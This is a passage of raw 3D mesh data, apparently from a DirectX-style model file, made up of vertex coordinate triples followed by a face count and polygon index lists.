-0.325457;0.809829;-0.474371;, -0.319518;0.829845;-0.479134;, -0.306621;0.881497;-0.467516;, -0.294167;0.931380;-0.439788;, -0.288859;0.952614;-0.388679;, -0.288868;0.952614;-0.709460;, -0.294170;0.931381;-0.656829;, -0.306623;0.881498;-0.629034;, -0.319520;0.829847;-0.617380;, -0.325460;0.809830;-0.622143;, -0.325466;0.809830;-0.889444;, -0.319527;0.829847;-0.894208;, -0.306631;0.881498;-0.882555;, -0.294175;0.931381;-0.854152;, -0.288871;0.952614;-0.802118;, -0.236820;0.735705;0.218273;, -0.236827;0.735705;-0.049008;, -0.212665;0.739875;-0.053772;, -0.160203;0.748924;-0.042120;, -0.109536;0.757667;-0.013734;, -0.087967;0.761385;0.038300;, -0.087965;0.761385;0.130957;, -0.109530;0.757666;0.183589;, -0.160196;0.748925;0.211381;, -0.212657;0.739875;0.223036;, -0.236833;0.735705;-0.194966;, -0.236838;0.735704;-0.458009;, -0.212677;0.739873;-0.462772;, -0.160214;0.748925;-0.451155;, -0.109548;0.757668;-0.423429;, -0.087978;0.761385;-0.372320;, -0.087976;0.761386;-0.281942;, -0.109541;0.757667;-0.228956;, -0.160207;0.748925;-0.201823;, -0.212670;0.739874;-0.190203;, -0.236841;0.735704;-0.605781;, -0.236848;0.735703;-0.873083;, -0.212686;0.739873;-0.877847;, -0.160224;0.748924;-0.866195;, -0.109556;0.757666;-0.837793;, -0.087987;0.761384;-0.785759;, -0.087986;0.761384;-0.693101;, -0.109550;0.757666;-0.640470;, -0.160216;0.748924;-0.612674;, -0.212677;0.739873;-0.601019;, -0.071795;0.538937;0.206763;, -0.122460;0.530195;0.234555;, -0.174922;0.521145;0.246210;, -0.199084;0.516975;0.241447;, -0.199092;0.516975;-0.025833;, -0.174928;0.521145;-0.030598;, -0.122468;0.530195;-0.018946;, -0.071799;0.538937;0.009440;, -0.050231;0.542655;0.061474;, -0.050230;0.542655;0.154132;, -0.071805;0.538937;-0.205781;, -0.122469;0.530195;-0.178649;, -0.174932;0.521145;-0.167028;, -0.199094;0.516975;-0.171791;, -0.199101;0.516974;-0.434834;, -0.174939;0.521143;-0.439598;, -0.122477;0.530195;-0.427981;, -0.071809;0.538938;-0.400254;, -0.050241;0.542655;-0.349146;, -0.050237;0.542656;-0.258767;, -0.071815;0.538936;-0.617295;, -0.122480;0.530194;-0.589500;, -0.174941;0.521143;-0.577844;, -0.199104;0.516974;-0.582607;, -0.199111;0.516974;-0.845058;, -0.174948;0.521143;-0.849823;, -0.122488;0.530195;-0.843020;, -0.071818;0.538936;-0.814619;, -0.050251;0.542655;-0.762585;, -0.050248;0.542655;-0.669927;, -1.212288;0.926914;0.317266;, -0.792362;0.895623;0.317550;, -1.213593;0.927007;0.381385;, -0.788320;0.895467;0.381329;, -0.937266;0.901917;0.312687;, -0.795736;0.891414;0.312683;, -0.938570;0.902012;0.385950;, -0.797041;0.891509;0.385946;, -0.936873;0.982152;0.310775;, -0.795343;0.971649;0.310771;, -0.936964;0.929272;0.310774;, -0.795435;0.918769;0.310771;, -0.944683;0.907051;0.381377;, -0.946007;0.907153;0.317259;, -0.944406;0.982709;0.317243;, -0.947823;0.930078;0.311030;, -0.788235;0.954426;0.339491;, -0.788291;0.956172;0.337356;, -0.787266;0.978272;0.337319;, -0.787059;0.979944;0.339345;, -0.785877;0.976307;0.360603;, -0.786728;0.958039;0.360605;, -0.785970;0.970830;0.363148;, -0.786311;0.963497;0.363147;, -0.787131;0.954430;0.356874;, -0.787807;0.951748;0.348213;, -0.788255;0.954887;0.338848;, -0.788273;0.955459;0.338137;, -0.788250;0.962276;0.333517;, -0.787787;0.972246;0.333523;, -0.787187;0.978954;0.338061;, -0.787119;0.979501;0.338736;, -0.786379;0.982670;0.348045;, -0.785947;0.979970;0.356826;, -0.872339;0.977363;0.310773;, -0.872485;0.897108;0.385948;, -0.874000;0.897222;0.312685;, -0.873459;0.924559;0.310773;, -0.888384;1.018198;0.331890;, -0.918050;1.020399;0.332526;, -0.916967;1.020317;0.367060;, -0.887971;1.018165;0.366418;, -0.908155;1.019662;0.371385;, -0.896033;1.018763;0.370962;, -0.881758;1.017704;0.357533;, -0.881804;1.017709;0.341011;, -0.897318;1.018861;0.327334;, -0.909890;1.019794;0.327770;, -0.923980;1.020839;0.341220;, -0.923862;1.020829;0.357747;, -0.916535;1.026140;0.367061;, -0.907723;1.025485;0.371386;, -0.895601;1.024586;0.370962;, -0.887538;1.023988;0.366418;, -0.881327;1.023527;0.357534;, -0.881372;1.023532;0.341012;, -0.887952;1.024021;0.331891;, -0.896885;1.024684;0.327334;, -0.909457;1.025617;0.327771;, -0.917618;1.026222;0.332527;, -0.923549;1.026662;0.341221;, -0.923430;1.026652;0.357747;, -0.780057;0.976037;0.360234;, -0.780150;0.970559;0.362778;, -0.780490;0.963227;0.362778;, -0.780905;0.957769;0.360236;, -0.781311;0.954159;0.356504;, -0.781984;0.951478;0.347844;, -0.782414;0.954155;0.339121;, -0.782434;0.954616;0.338478;, -0.782453;0.955189;0.337767;, -0.782469;0.955902;0.336987;, -0.782429;0.962006;0.333147;, -0.781965;0.971976;0.333153;, -0.781445;0.978002;0.336949;, -0.781365;0.978683;0.337691;, -0.781297;0.979231;0.338366;, -0.781239;0.979673;0.338975;, -0.780560;0.982400;0.347675;, -0.780127;0.979699;0.356456;, -0.870578;1.016877;0.323913;, -0.876667;1.017330;0.319087;, -0.882009;1.017726;0.312687;, -0.875508;1.009017;0.312686;, -0.871927;0.995537;0.312048;, -0.871490;1.004605;0.323912;, -0.873994;1.008899;0.385950;, -0.870439;1.004523;0.374724;, -0.870444;0.993279;0.385950;, -0.880493;1.017609;0.385951;, -0.875520;1.017240;0.379441;, -0.869528;1.016796;0.374725;, -0.799359;0.990219;0.311412;, -0.799264;0.999907;0.324167;, -0.788170;0.986286;0.317197;, -0.787569;0.989223;0.324540;, -0.787033;0.993803;0.329616;, -0.796206;0.987485;0.386597;, -0.793674;0.998826;0.374736;, -0.784522;0.993616;0.369290;, -0.784468;0.987809;0.374369;, -0.784337;0.981261;0.381261;, -0.934166;1.013370;0.312688;, -0.936101;1.012486;0.325081;, -0.937997;1.000440;0.312050;, -0.945031;0.997903;0.317254;, -0.942060;1.005971;0.328865;, -1.211571;1.052278;0.328495;, -1.212258;1.040929;0.317263;, -1.208779;1.040717;0.381386;, -1.208994;1.052084;0.370158;, -0.938356;1.005627;0.375290;, -0.938404;0.994312;0.382163;, -0.933201;1.012895;0.374144;, -0.930202;1.013070;0.385952;, -0.931901;0.997216;0.387042;, -0.934291;1.021602;0.374741;, -0.928113;1.021143;0.379656;, -0.922486;1.020725;0.385952;, -0.926451;1.021025;0.312688;, -0.931118;1.021370;0.319301;, -0.937042;1.021810;0.323900;, -0.797419;0.956665;0.267714;, -1.213450;0.987563;0.264451;, -0.798016;0.956721;0.238660;, -1.205746;0.986991;0.235462;, -1.422546;1.063021;0.498028;, -1.412659;1.080711;0.497694;, -1.394325;1.089015;0.494931;, -1.223941;1.077662;0.478722;, -1.206066;1.067430;0.473128;, -1.197374;1.048325;0.468690;, -1.187985;1.034434;0.538746;, -1.196283;1.057788;0.544125;, -1.213833;1.067918;0.550897;, -1.383762;1.079352;0.568953;, -1.402162;1.071104;0.571629;, -1.412253;1.049130;0.571977;, -1.203197;0.910820;-0.860567;, -1.191853;0.898652;-0.860567;, -1.191915;0.897753;-0.653625;, -1.203464;0.910307;-0.653625;, -1.191973;0.896911;-0.459711;, -1.203714;0.909825;-0.459710;, -1.192041;0.895936;-0.235194;, -1.204003;0.909268;-0.235193;, -1.203672;0.927964;-0.384919;, -1.203769;0.927778;-0.310080;, -1.203147;0.928973;-0.791635;, -1.203236;0.928802;-0.722654;, -1.203139;0.919961;-0.851743;, -1.203382;0.919491;-0.662497;, -1.203657;0.918963;-0.450135;, -1.203922;0.918454;-0.244817;, -1.555183;0.909268;-0.235184;, -1.555183;0.918454;-0.244807;, -1.555185;0.927778;-0.310071;, -1.555187;0.927964;-0.384910;, -1.555189;0.918963;-0.450126;, -1.555189;0.909825;-0.459701;, -1.555189;0.896911;-0.459701;, -1.555183;0.895936;-0.235184;, -1.555198;0.928973;-0.791625;, -1.555199;0.919961;-0.851734;, -1.555200;0.910820;-0.860558;, -1.555199;0.898652;-0.860558;, -1.555194;0.897753;-0.653615;, -1.555194;0.910307;-0.653615;, -1.555195;0.919491;-0.662487;, -1.555196;0.928802;-0.722644;, -1.591737;0.905088;-0.235201;, -1.598387;0.911406;-0.244837;, -1.604964;0.917895;-0.310112;, -1.604864;0.918124;-0.384951;, -1.598115;0.912035;-0.450154;, -1.591440;0.905776;-0.459718;, -1.582047;0.896913;-0.459700;, -1.582042;0.895937;-0.235183;, -1.591182;0.906371;-0.653631;, -1.597833;0.912686;-0.662515;, -1.604416;0.919159;-0.722685;, -1.604325;0.919371;-0.791665;, -1.597582;0.913267;-0.851762;, -1.590907;0.907005;-0.860573;, -1.582057;0.898654;-0.860557;, -1.582052;0.897754;-0.653614;, -1.610752;0.897729;-0.459751;, -1.601190;0.889048;-0.459733;, -1.601185;0.888073;-0.235216;, -1.611055;0.897035;-0.235235;, -1.617825;0.903224;-0.244871;, -1.624520;0.909585;-0.310147;, -1.624419;0.909816;-0.384986;, -1.617547;0.903858;-0.450188;, -1.610210;0.898969;-0.860607;, -1.601201;0.890789;-0.860590;, -1.601196;0.889889;-0.653648;, -1.610489;0.898329;-0.653665;, -1.617260;0.904515;-0.662550;, -1.623962;0.910860;-0.722720;, -1.623869;0.911073;-0.791700;, -1.617004;0.905100;-0.851796;, -1.637085;0.892712;-0.722802;, -1.636964;0.892969;-0.791782;, -1.628201;0.890203;-0.851865;, -1.619525;0.887244;-0.860662;, -1.608025;0.883272;-0.860626;, -1.608018;0.882372;-0.653684;, -1.619884;0.886472;-0.653720;, -1.628528;0.889496;-0.662619;, -1.637800;0.891171;-0.310231;, -1.637669;0.891450;-0.385070;, -1.628896;0.888702;-0.450258;, -1.620220;0.885747;-0.459807;, -1.608013;0.881531;-0.459770;, -1.608008;0.880555;-0.235253;, -1.620610;0.884908;-0.235291;, -1.629253;0.887936;-0.244941;, -1.611684;0.871760;-0.653729;, -1.624234;0.871760;-0.653781;, -1.633375;0.871760;-0.662691;, -1.642425;0.871760;-0.722887;, -1.642298;0.871760;-0.791867;, -1.633028;0.871760;-0.851937;, -1.623853;0.871760;-0.860723;, -1.611690;0.871760;-0.860671;, -1.611674;0.871760;-0.235298;, -1.625002;0.871760;-0.235353;, -1.634143;0.871760;-0.245015;, -1.643181;0.871760;-0.310317;, -1.643044;0.871760;-0.385155;, -1.633765;0.871760;-0.450332;, -1.624590;0.871760;-0.459869;, -1.611680;0.871760;-0.459815;, -0.207232;0.906927;0.027099;, -0.147455;0.853400;0.033901;, -0.147453;0.853400;0.126559;, -0.207231;0.906927;0.119757;, -0.221130;0.890083;-0.024992;, -0.161320;0.836561;-0.018068;, -0.253747;0.850525;-0.053538;, -0.191977;0.798636;-0.045191;, -0.287483;0.809603;-0.065410;, -0.226923;0.756756;-0.057005;, -0.302847;0.790997;-0.060747;, -0.245377;0.742753;-0.052241;, -0.302840;0.790997;0.206533;, -0.245368;0.742753;0.215039;, -0.287476;0.809603;0.211397;, -0.226915;0.756756;0.219802;, -0.253739;0.850526;0.199963;, -0.191516;0.798957;0.206176;, -0.221123;0.890083;0.172331;, -0.159526;0.837192;0.177209;, -0.207243;0.906928;-0.383521;, -0.147466;0.853401;-0.376719;, -0.147464;0.853401;-0.286340;, -0.207242;0.906928;-0.293142;, -0.221140;0.890084;-0.434686;, -0.161331;0.836562;-0.427763;, -0.253757;0.850526;-0.462573;, -0.191982;0.798651;-0.454238;, -0.287494;0.809601;-0.474411;, -0.226934;0.756755;-0.466006;, -0.302858;0.790997;-0.469748;, -0.245387;0.742752;-0.461242;, -0.302851;0.790997;-0.206705;, -0.245380;0.742753;-0.198200;, -0.287488;0.809601;-0.201841;, -0.226927;0.756755;-0.193436;, -0.253749;0.850526;-0.213241;, -0.191526;0.798968;-0.207012;, -0.221136;0.890084;-0.240214;, -0.159509;0.837183;-0.235338;, -0.207253;0.906928;-0.796960;, -0.147476;0.853402;-0.790158;, -0.147474;0.853402;-0.697500;, -0.207252;0.906928;-0.704302;, -0.221149;0.890084;-0.849050;, -0.161339;0.836562;-0.842127;, -0.253767;0.850527;-0.877612;, -0.191998;0.798637;-0.869265;, -0.287502;0.809603;-0.889486;, -0.226943;0.756756;-0.881081;, -0.302868;0.790998;-0.884822;, -0.245395;0.742753;-0.876317;, -0.302860;0.790998;-0.617521;, -0.245390;0.742753;-0.609015;, -0.287496;0.809603;-0.612657;, -0.226935;0.756756;-0.604252;, -0.253759;0.850526;-0.624092;, -0.191536;0.798958;-0.617879;, -0.221144;0.890084;-0.651727;, -0.159546;0.837194;-0.646849;, -1.681977;0.772930;-0.197474;, -1.670747;0.772882;-0.186246;, -1.670748;0.761702;-0.197523;, -1.543053;0.772882;-0.186249;, -1.531824;0.772930;-0.197477;, -1.543053;0.761702;-0.197526;, -1.531828;0.776074;-0.921088;, -1.543056;0.776122;-0.932316;, -1.543056;0.764845;-0.921136;, -1.670777;0.776122;-0.932312;, -1.682005;0.776074;-0.921084;, -1.670777;0.764845;-0.921133;, -1.670777;0.876858;-0.920647;, -1.682005;0.865630;-0.920696;, -1.670777;0.865679;-0.931924;, -1.670748;0.873715;-0.197036;, -1.670747;0.862438;-0.185857;, -1.681977;0.862487;-0.197084;, -1.543053;0.873715;-0.197039;, -1.531824;0.862487;-0.197088;, -1.543053;0.862438;-0.185860;, -1.531828;0.865630;-0.920699;, -1.543056;0.876858;-0.920650;, -1.543056;0.865679;-0.931927;; 1269; 4;269,260,261,268;, 4;270,259,260,269;, 4;271,258,259,270;, 4;272,257,258,271;, 4;266,237,239,267;, 4;265,234,237,266;, 4;267,239,241,268;, 4;268,241,243,269;, 4;269,243,245,270;, 4;270,245,247,271;, 4;271,247,249,272;, 4;272,249,251,273;, 4;273,251,253,254;, 4;262,238,236,263;, 4;263,236,235,264;, 4;261,240,238,262;, 4;260,242,240,261;, 4;259,244,242,260;, 4;258,246,244,259;, 4;257,248,246,258;, 4;256,250,248,257;, 4;255,252,250,256;, 4;216,207,239,237;, 4;225,216,237,234;, 4;226,217,216,225;, 4;217,208,207,216;, 4;208,199,198,207;, 4;207,198,241,239;, 4;198,189,243,241;, 4;199,190,189,198;, 4;200,191,190,199;, 4;201,192,191,200;, 4;202,193,192,201;, 4;203,194,193,202;, 4;204,195,194,203;, 4;205,196,195,204;, 4;206,197,196,205;, 4;240,242,197,206;, 4;238,240,206,215;, 4;236,238,215,224;, 4;235,236,224,233;, 4;233,224,223,232;, 4;224,215,214,223;, 4;215,206,205,214;, 4;214,205,204,213;, 4;223,214,213,222;, 4;232,223,222,231;, 4;231,222,221,230;, 4;222,213,212,221;, 3;213,204,212;, 4;221,212,211,220;, 4;230,221,220,229;, 4;229,220,219,228;, 4;220,211,210,219;, 3;210,211,201;, 4;210,201,200,209;, 4;219,210,209,218;, 4;228,219,218,227;, 4;227,218,217,226;, 4;218,209,208,217;, 4;209,200,199,208;, 4;192,183,182,191;, 4;191,182,181,190;, 4;190,181,180,189;, 4;189,180,245,243;, 4;180,171,247,245;, 4;181,172,171,180;, 4;182,173,172,181;, 4;183,174,173,182;, 4;184,175,174,183;, 4;185,176,175,184;, 4;186,177,176,185;, 4;187,178,177,186;, 4;188,179,178,187;, 4;244,246,179,188;, 4;246,248,170,179;, 4;179,170,169,178;, 4;178,169,168,177;, 4;177,168,167,176;, 4;168,159,158,167;, 4;159,150,149,158;, 4;158,149,148,157;, 4;157,148,147,156;, 4;166,157,156,165;, 4;167,158,157,166;, 3;176,167,175;, 3;174,175,165;, 4;174,165,164,173;, 4;165,156,155,164;, 4;156,147,146,155;, 4;155,146,145,154;, 4;164,155,154,163;, 4;173,164,163,172;, 4;172,163,162,171;, 4;171,162,249,247;, 4;162,153,251,249;, 4;153,144,253,251;, 4;154,145,144,153;, 4;163,154,153,162;, 4;248,250,161,170;, 4;250,252,152,161;, 4;161,152,151,160;, 4;170,161,160,169;, 4;169,160,159,168;, 4;160,151,150,159;, 4;195,186,185,194;, 4;196,187,186,195;, 4;197,188,187,196;, 4;242,244,188,197;, 4;194,185,184,193;, 4;193,184,183,192;, 4;268,261,262,267;, 4;267,262,263,266;, 4;266,263,264,265;, 4;273,256,257,272;, 4;254,255,256,273;, 3;212,204,203;, 4;212,203,202,211;, 3;202,201,211;, 3;175,167,166;, 3;166,165,175;, 11;234,235,233,232,231,230,229,228,227,226,225;, 4;264,235,234,265;, 11;252,253,144,145,146,147,148,149,150,151,152;, 4;254,253,252,255;, 4;61,71,70,60;, 4;63,61,60,62;, 6;71,61,63,65,67,69;, 4;71,69,68,70;, 4;69,67,66,68;, 4;67,65,64,66;, 4;65,63,62,64;, 6;62,60,70,68,66,64;, 4;1166,1164,1163,1165;, 8;1250,1251,1252,1253,1254,1255,1256,1249;, 4;1332,1335,1339,1329;, 4;1317,1334,1330,1327;, 4;1326,1331,1340,1324;, 4;1323,1338,1336,1321;, 4;1320,1337,1333,1318;, 4;1325,1322,1319,1328;, 8;1242,1243,1244,1245,1246,1247,1248,1241;, 6;74,72,82,80,78,76;, 4;81,79,78,80;, 4;79,77,76,78;, 4;77,75,74,76;, 6;83,73,75,77,79,81;, 4;73,83,82,72;, 4;75,73,72,74;, 4;83,81,80,82;, 3;848,1023,1025;, 4;1131,1130,1129,1128;, 4;1133,1134,1129,1130;, 3;1139,1137,1141;, 12;1082,1083,1084,1073,1074,1075,1076,1077,1078,1079,1080,1081;, 3;1125,1144,1142;, 18;1100,1101,1102,1085,1086,1087,1088,1089,1090,1091,1092,1093,1094,1095,1096,1097,1098,1099;, 12;501,490,491,492,493,494,495,496,497,498,499,500;, 12;439,440,441,430,431,432,433,434,435,436,437,438;, 12;451,452,453,442,443,444,445,446,447,448,449,450;, 12;489,478,479,480,481,482,483,484,485,486,487,488;, 10;676,677,678,669,670,671,672,673,674,675;, 4;676,661,660,677;, 10;659,665,664,663,660,661,666,667,668,662;, 12;427,428,429,418,419,420,421,422,423,424,425,426;, 12;513,502,503,504,505,506,507,508,509,510,511,512;, 12;477,466,467,468,469,470,471,472,473,474,475,476;, 12;463,464,465,454,455,456,457,458,459,460,461,462;, 4;996,963,964,997;, 10;1000,1001,1002,993,994,995,996,997,998,999;, 10;1010,1011,1012,1003,1004,1005,1006,1007,1008,1009;, 4;1006,973,974,1007;, 10;1020,1021,1022,1013,1014,1015,1016,1017,1018,1019;, 4;1016,983,984,1017;, 4;6,36,37,7;, 4;7,39,38,6;, 4;54,6,38,55;, 4;53,36,6,54;, 4;52,24,36,53;, 4;36,24,29,37;, 4;34,29,24,32;, 4;51,32,24,52;, 7;56,57,51,52,53,54,55;, 4;56,27,33,57;, 4;30,35,33,27;, 4;39,30,27,38;, 4;55,38,27,56;, 4;26,33,35,31;, 4;57,33,26,58;, 3;58,51,57;, 5;59,40,50,51,58;, 4;58,26,4,59;, 4;4,26,31,5;, 4;5,3,2,4;, 4;59,4,2,40;, 4;40,2,0,41;, 4;3,1,0,2;, 4;1,23,22,0;, 4;41,0,22,42;, 4;42,22,20,43;, 4;23,21,20,22;, 4;21,19,18,20;, 4;19,17,16,18;, 4;44,18,16,45;, 4;43,20,18,44;, 11;49,50,40,41,42,43,44,45,46,47,48;, 4;49,8,25,50;, 4;9,28,25,8;, 4;28,34,32,25;, 4;50,25,32,51;, 4;11,9,8,10;, 4;48,10,8,49;, 4;47,12,10,48;, 4;13,11,10,12;, 4;15,13,12,14;, 4;46,14,12,47;, 4;45,16,14,46;, 4;17,15,14,16;, 7;29,34,35,30,39,7,37;, 3;28,35,34;, 5;9,11,31,35,28;, 11;5,31,11,13,15,17,19,21,23,1,3;, 4;91,123,122,90;, 4;138,90,122,139;, 4;137,120,90,138;, 4;90,120,121,91;, 4;120,108,113,121;, 4;136,108,120,137;, 4;135,116,108,136;, 4;118,113,108,116;, 4;112,118,116,109;, 4;134,109,116,135;, 3;135,141,134;, 5;133,134,141,142,132;, 4;133,92,109,134;, 4;93,112,109,92;, 4;95,93,92,94;, 4;132,94,92,133;, 4;131,96,94,132;, 4;97,95,94,96;, 4;99,97,96,98;, 4;130,98,96,131;, 4;129,100,98,130;, 4;101,99,98,100;, 4;103,101,100,102;, 4;128,102,100,129;, 4;127,104,102,128;, 4;105,103,102,104;, 4;107,105,104,106;, 4;126,106,104,127;, 4;125,84,106,126;, 4;85,107,106,84;, 4;87,85,84,86;, 4;124,86,84,125;, 4;143,88,86,124;, 4;89,87,86,88;, 4;88,110,115,89;, 4;142,110,88,143;, 11;131,132,142,143,124,125,126,127,128,129,130;, 4;141,117,110,142;, 4;110,117,119,115;, 4;114,119,117,111;, 4;140,111,117,141;, 7;140,141,135,136,137,138,139;, 4;139,122,111,140;, 4;123,114,111,122;, 7;113,118,119,114,123,91,121;, 3;115,119,118;, 5;89,115,118,112,87;, 11;85,87,112,93,95,97,99,101,103,105,107;, 4;783,784,786,785;, 4;775,776,784,783;, 4;777,779,784,776;, 4;786,784,779,781;, 4;782,781,779,780;, 4;780,779,777,778;, 4;778,777,774,772;, 4;774,777,776,771;, 4;776,775,770,771;, 4;691,738,770,775;, 4;783,688,691,775;, 4;785,682,688,783;, 5;764,697,682,785,762;, 4;761,762,785,786;, 4;761,786,781,759;, 4;781,782,758,759;, 7;1161,1173,758,782,780,778,772;, 3;1171,758,1173;, 3;1172,758,1171;, 6;798,758,1172,1174,1175,1169;, 5;757,758,798,799,787;, 4;757,787,751,765;, 4;760,757,765,763;, 4;763,764,762,760;, 3;761,760,762;, 4;760,761,759,757;, 3;758,757,759;, 3;773,772,774;, 4;773,774,771,769;, 3;770,769,771;, 4;769,770,748,749;, 4;748,770,734,731;, 4;770,738,735,734;, 4;695,734,735,692;, 4;695,692,687,690;, 4;690,687,681,684;, 4;698,699,684,681;, 4;768,699,698,766;, 4;767,768,766,765;, 3;767,765,751;, 4;751,752,768,767;, 4;752,700,699,768;, 4;754,701,700,752;, 4;683,700,701,680;, 4;686,689,683,680;, 4;693,696,689,686;, 4;693,730,731,696;, 4;727,748,731,730;, 4;748,727,694,745;, 4;745,694,685,744;, 4;744,685,679,742;, 5;679,702,756,739,742;, 4;741,739,756,755;, 3;740,739,741;, 5;833,789,740,741,832;, 3;832,831,833;, 4;835,833,831,793;, 3;869,833,835;, 3;834,833,869;, 3;833,834,789;, 3;834,900,789;, 4;789,900,899,740;, 4;740,899,742,739;, 4;899,743,744,742;, 4;745,744,743,746;, 4;747,748,745,746;, 3;748,747,749;, 5;749,747,792,854,855;, 3;855,854,856;, 3;854,892,856;, 3;853,856,892;, 3;856,853,750;, 5;750,853,820,822,788;, 3;822,824,788;, 3;822,885,824;, 4;826,824,885,823;, 4;801,797,826,823;, 4;801,876,799,797;, 4;876,800,787,799;, 5;800,802,835,793,787;, 7;787,793,831,832,741,755,753;, 4;755,756,754,753;, 4;756,702,701,754;, 4;753,754,752,751;, 3;751,787,753;, 3;798,797,799;, 6;797,798,1176,1168,825,826;, 4;825,1168,1167,824;, 3;824,1167,788;, 8;1165,769,749,855,856,750,788,1167;, 3;1163,769,1165;, 3;1163,1162,769;, 3;773,769,1162;, 4;773,1162,1161,772;, 4;1188,1162,1163,1189;, 4;1207,1188,1189,1208;, 4;1218,1207,1208,1219;, 4;1229,1218,1219,1230;, 4;1248,1229,1230,1241;, 4;1256,1237,1238,1249;, 4;1237,1210,1211,1238;, 4;1210,1199,1200,1211;, 4;1199,1183,1184,1200;, 4;1183,1165,1167,1184;, 4;1166,1175,1174,1164;, 3;1170,798,1169;, 3;1176,798,1170;, 3;825,824,826;, 4;820,886,885,822;, 4;823,885,886,821;, 4;803,801,823,821;, 4;803,877,876,801;, 4;877,802,800,876;, 4;878,804,802,877;, 4;805,878,877,803;, 4;805,803,821,819;, 4;821,886,887,819;, 4;818,887,886,820;, 4;818,820,853,850;, 4;893,850,853,892;, 4;851,893,892,852;, 4;852,866,868,851;, 3;852,791,866;, 3;791,852,792;, 4;747,746,791,792;, 3;854,792,852;, 3;852,892,854;, 3;865,1148,790;, 4;790,900,901,865;, 4;743,899,900,790;, 4;790,1148,1147,743;, 4;1145,1147,1148,1146;, 6;865,901,902,867,1146,1148;, 4;837,902,901,834;, 4;834,869,870,837;, 4;836,870,869,835;, 4;802,804,836,835;, 5;839,836,804,806,808;, 4;879,806,804,878;, 4;807,879,878,805;, 4;807,805,819,817;, 4;819,887,888,817;, 4;816,888,887,818;, 5;816,818,850,849,812;, 4;894,849,850,893;, 4;848,894,893,851;, 3;1023,848,851;, 4;838,848,1025,1132;, 3;864,848,838;, 4;838,871,872,864;, 4;857,872,871,839;, 4;808,860,857,839;, 4;880,881,860,808;, 4;861,881,880,809;, 3;809,813,861;, 3;861,813,862;, 5;1149,862,813,814,1160;, 4;813,889,890,814;, 4;815,890,889,812;, 4;815,812,849,845;, 4;895,845,849,894;, 4;844,895,894,848;, 4;844,848,1154,1155;, 3;1154,848,863;, 3;863,848,864;, 4;864,872,873,863;, 4;858,873,872,857;, 4;860,859,858,857;, 4;882,859,860,881;, 4;862,882,881,861;, 4;862,1149,1150,882;, 4;882,1150,1151,859;, 4;859,1151,1152,858;, 4;858,1152,1153,873;, 4;873,1153,1154,863;, 4;1153,1156,1155,1154;, 4;1156,1153,1152,1157;, 4;1157,1152,1151,1158;, 4;1158,1151,1150,1159;, 4;1159,1150,1149,1160;, 4;883,1159,1160,811;, 3;1160,814,811;, 4;828,811,814,829;, 3;814,891,829;, 3;814,890,891;, 4;830,891,890,815;, 3;830,815,794;, 6;794,815,845,846,796,795;, 4;896,846,845,895;, 3;844,896,895;, 3;896,844,847;, 4;847,844,840,842;, 4;840,874,875,842;, 4;843,875,874,841;, 4;843,841,810,827;, 4;884,827,810,883;, 4;828,884,883,811;, 4;810,1158,1159,883;, 4;841,1157,1158,810;, 4;874,1156,1157,841;, 4;840,1155,1156,874;, 3;840,844,1155;, 3;1133,838,1132;, 4;837,838,1133,1130;, 4;902,837,1130,1131;, 4;837,870,871,838;, 4;839,871,870,836;, 3;1037,1031,867;, 3;867,1031,1146;, 4;1057,1145,1146,1031;, 3;900,834,901;, 4;880,808,806,879;, 4;809,880,879,807;, 4;809,807,817,813;, 4;817,888,889,813;, 4;888,816,812,889;, 4;765,766,764,763;, 4;766,698,697,764;, 4;1021,988,989,1022;, 4;1022,989,990,1013;, 4;1013,990,991,1014;, 4;990,1316,1314,991;, 4;989,1299,1316,990;, 4;988,1298,1299,989;, 4;987,1302,1298,988;, 4;986,1304,1302,987;, 4;1019,986,987,1020;, 4;1020,987,988,1021;, 4;1018,985,986,1019;, 4;985,1306,1304,986;, 4;1303,1304,1306,1305;, 4;1301,1302,1304,1303;, 4;1297,1298,1302,1301;, 4;1300,1299,1298,1297;, 4;1315,1316,1299,1300;, 4;1313,1314,1316,1315;, 4;1311,1312,1314,1313;, 4;991,1314,1312,992;, 4;1014,991,992,1015;, 4;1015,992,983,1016;, 4;992,1312,1310,983;, 4;1309,1310,1312,1311;, 4;1311,956,957,1309;, 4;956,923,924,957;, 4;955,932,923,956;, 4;954,931,932,955;, 4;953,930,931,954;, 4;962,929,930,953;, 4;961,928,929,962;, 4;960,927,928,961;, 4;959,926,927,960;, 4;958,925,926,959;, 4;1307,958,959,1305;, 4;1305,959,960,1303;, 4;1303,960,961,1301;, 4;1301,961,962,1297;, 4;1297,962,953,1300;, 4;1300,953,954,1315;, 4;1315,954,955,1313;, 4;1313,955,956,1311;, 4;932,709,710,923;, 4;931,708,709,932;, 4;930,707,708,931;, 4;929,706,707,930;, 4;928,705,706,929;, 4;927,704,705,928;, 4;926,703,704,927;, 4;925,737,703,926;, 4;703,737,738,691;, 4;703,691,688,704;, 4;704,688,682,705;, 4;705,682,697,706;, 4;706,697,698,707;, 4;707,698,681,708;, 4;708,681,687,709;, 4;709,687,692,710;, 4;692,735,736,710;, 4;923,710,736,924;, 4;1305,1306,1308,1307;, 4;984,1308,1306,985;, 4;1017,984,985,1018;, 4;983,1310,1308,984;, 4;1307,1308,1310,1309;, 4;1309,957,958,1307;, 4;957,924,925,958;, 4;924,736,737,925;, 4;736,735,738,737;, 4;1182,1166,1165,1183;, 4;1198,1182,1183,1199;, 4;1209,1198,1199,1210;, 4;1236,1209,1210,1237;, 4;1255,1236,1237,1256;, 4;1186,1173,1161,1187;, 4;1185,1171,1173,1186;, 4;1192,1172,1171,1185;, 4;1191,1174,1172,1192;, 4;1190,1164,1174,1191;, 4;1201,1190,1191,1202;, 4;1202,1191,1192,1203;, 4;1203,1192,1185,1204;, 4;1204,1185,1186,1205;, 4;1205,1186,1187,1206;, 4;1224,1205,1206,1217;, 4;1223,1204,1205,1224;, 4;1222,1203,1204,1223;, 4;1221,1202,1203,1222;, 4;1220,1201,1202,1221;, 4;1231,1220,1221,1232;, 4;1232,1221,1222,1225;, 4;1225,1222,1223,1226;, 4;1226,1223,1224,1227;, 4;1227,1224,1217,1228;, 4;1246,1227,1228,1247;, 4;1245,1226,1227,1246;, 4;1244,1225,1226,1245;, 4;1243,1232,1225,1244;, 4;1242,1231,1232,1243;, 4;1187,1161,1162,1188;, 4;1206,1187,1188,1207;, 4;1217,1206,1207,1218;, 4;1228,1217,1218,1229;, 4;1247,1228,1229,1248;, 4;1189,1163,1164,1190;, 4;1208,1189,1190,1201;, 4;1219,1208,1201,1220;, 4;1230,1219,1220,1231;, 4;1241,1230,1231,1242;, 4;1323,1324,1340,1338;, 3;1324,1323,1325;, 4;1328,1326,1324,1325;, 3;1327,1326,1328;, 4;1326,1327,1330,1331;, 3;1330,1329,1331;, 